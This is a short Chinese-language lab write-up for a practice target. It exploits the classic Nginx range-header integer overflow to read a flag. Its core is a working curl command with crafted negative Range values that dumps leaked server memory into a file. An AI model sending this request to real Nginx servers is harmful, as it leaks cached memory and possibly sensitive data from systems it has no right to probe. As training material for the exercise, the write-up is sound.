经典CVE：Nginx整数溢出漏洞

靶场地址：http://www.whalwl.site:8040/

解题准备：了解Nginx整数溢出漏洞的利用方法

解题思路：

1、根据首页提示，手动访问

http://www.whalwl.site:8040/proxy/demo.png

 2、发现图片存在，于是根据提示构造poyload

curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt

3、 打开自己主机的命令行，执行后在桌面生成poc.txt，用notepad++打开即可发现flag